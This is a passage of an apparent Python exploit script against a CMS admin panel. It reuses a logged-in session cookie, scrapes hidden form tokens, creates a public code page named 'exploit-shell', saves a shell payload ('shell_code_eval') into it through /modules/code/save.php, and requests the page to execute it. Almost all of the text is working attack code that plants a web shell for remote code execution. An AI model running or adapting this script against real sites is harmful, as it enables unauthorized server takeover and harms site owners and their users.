login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False) cok = r.headers['Set-Cookie'] cok = cok.split(' ')[0] cookie_par = cok.split('=')[0] cookie_val = cok.split('=')[1].replace(';','') session_cookie = cookie_par + "=" + cookie_val ##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS url = main_url+"/admin/pages/index.php" cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) create_page = req.text soup = BeautifulSoup(create_page, 'html.parser') weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name'] weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value'] ##Create Code Page to Put Shell Code create_page = requests.session() burp0_url = main_url+"/admin/pages/add.php" burp0_cookies = {cookie_par : cookie_val} burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"} c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) ##FIND THE PAGE ID url = main_url+"/admin/pages/index.php" cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) find_id = req.text soup = BeautifulSoup(find_id, 'html.parser') pageid = soup.find_all('option',string='exploit-shell')[0]['value'] ##HTML PARSE TO PUT SHELL CODE url = main_url+'/admin/pages/modify.php?page_id='+pageid cookies = {cookie_par : cookie_val} req = requests.get(url, cookies=cookies) add_shellcode = req.text soup = BeautifulSoup(add_shellcode, 'html.parser') weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name'] weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value'] ##ADD SHELL CODE session = requests.session() burp0_url = main_url+"/modules/code/save.php" burp0_cookies = {cookie_par : cookie_val} burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} burp0_data = {"page_id": pageid, "section_id": pageid, 
weird_par2: weird_val2, "content": shell_code_eval} a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)